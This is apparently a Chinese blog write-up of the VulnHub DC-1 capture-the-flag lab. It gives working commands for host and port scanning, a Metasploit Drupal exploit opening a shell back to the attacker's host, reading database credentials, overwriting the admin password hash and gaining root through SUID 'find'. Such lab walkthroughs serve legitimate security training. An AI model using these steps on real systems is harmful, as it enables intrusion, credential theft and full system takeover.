freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DC-1打靶过程记录
2023-01-31 14:38:37
所属地 浙江省

下载方式:

下载链接:https://www.vulnhub.com/entry/dc-1,292/

1675146418_63d8b4b2f20a1a9d8157c.png!small?1675146420604

1、发现主机

netdiscover -r 192.168.244.0/24     
因为我的是虚拟机知道网段,不指定参数,只写netdiscover会扫描全部的内网网段(如果扫描了很多IP,可以通过查看虚拟机的MAC地址判断靶机到底是哪个IP 虚拟机--> 设置 --> 网络适配器--> 高级-->最下面就有MAC地址 )

1675146521_63d8b51967b63594a4299.png!small?1675146523069

2、扫端口

nmap -sS 192.168.244.6

3、收集信息,查找漏洞

发现CMS
或者使用kali里的whatweb工具,命令:whatweb -v 192.168.244.6

1675146560_63d8b540a01f0dce39358.png!small?1675146562285

kali寻找模块
search drupal
use 2       //不知道用哪个一个一个试好了
set rhosts 192.168.244.6
set lhost 192.168.244.66 //最好不要设置127.0.0.1,我测试不成功

1675146586_63d8b55a18890544257ac.png!small?1675146587405

flag1

shell    //进入cmd命令
ls       //查看当前目录,发现flagq.txt
cat flag1.txt

1675146600_63d8b5687c29338d92c45.png!small?1675146602028

提示去看配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php

pwd           //查看当前路径
cd sites/default   //进入目标目录
cat setting.txt     //查看配置文件

1675146625_63d8b58108c2248aa9102.png!small?1675146626504

*暴力和字典攻击不是最常见的
*只有获得访问权限的方法(您将需要访问权限)。
*你能用这些证书做什么?
//应该是要进行提权操作

flag2

发现flag2的信息,还有数据库信息

1675146639_63d8b58f4738cf469d955.png!small?1675146640638

尝试登录

python -c 'import pty; pty.spawn("/bin/bash")'   //用python达到一个数据交互的效果
mysql -udbuser -pR0ck3t
show databases;
use drupaldb
show tables;             //发现有users表
select * from users\G;   //竖着展示表里的内容

1675146663_63d8b5a731404e6f1c717.png!small?1675146664502

admin的密码:
$S$DYyHOGvUlVey/TRbXOU7.Gsp2wKX.9Q9Jt/SFd085Xhq.cAR.S0u
应该是加密了的HASH,不好解密,去找有关哈希hash的文件

find . -name "*hash*"   //查找含有hash字段的文件

1675146674_63d8b5b210aa40e88aa86.png!small?16751466752571675146686_63d8b5be42294ef166919.png!small?1675146687531


意思应该是直接再后面加密码就会返回加密后的结果,比如
./scripts/password-hash.sh 123456

1675146699_63d8b5cbdd7b8854ec9f3.png!small?1675146701351

那就直接更改一下管理员的密码

update users set pass='$S$DrNd8XhjOJxn3b3s9uR59MUTwgHRlw8cAi07ERzOuP24cYBNtn6N' where name='admin';

flag3

登陆成功,查找flag3.txt的信息

1675146834_63d8b65206ceafcab1fb7.png!small?16751468356961675146840_63d8b658945388b62ae1d.png!small?1675146842061


flag3提示我们需要特殊的find权限去执行操作
根据passwd想到/etc/passwd

1675146855_63d8b667e1c91719f42d8.png!small?16751468574081675146862_63d8b66ea89388272d387.png!small?1675146863960


需要提权

提权

使用命令查看 suid 权限的可执行二进制程序

find / -perm -u=s -type f 2>/dev/null

find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)

1675146876_63d8b67cde6a0172cb3b5.png!small?1675146878919

finalflag

使用find命令进行提权

find ./ aaa -exec '/bin/sh' \;

whoami //测试当前权限
cd /root
ls
cat thefinalflag.txt

1675146886_63d8b686c89766cb2fc3b.png!small?1675146888135

结束!!!

总结

1、使用netdiscover发现主机
2、使用nmap扫描端口
3、查找特征
4、利用msfconsole里的exp,对CMS进行渗透
5、寻找flag,根据提示找到配置文件
6、有flag信息,同时获取了数据库账号和密码
7、从数据库入手,解密不了就对admin的的密码进行重置
8、登录,查找flag信息
9、根据提示里有passed字段找到/etc/passwd,发现了flag
10、提示要提权,试试SUID提权,发现有find命令
11、利用find提权成功进入root拿到最后一个flag


# web安全
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录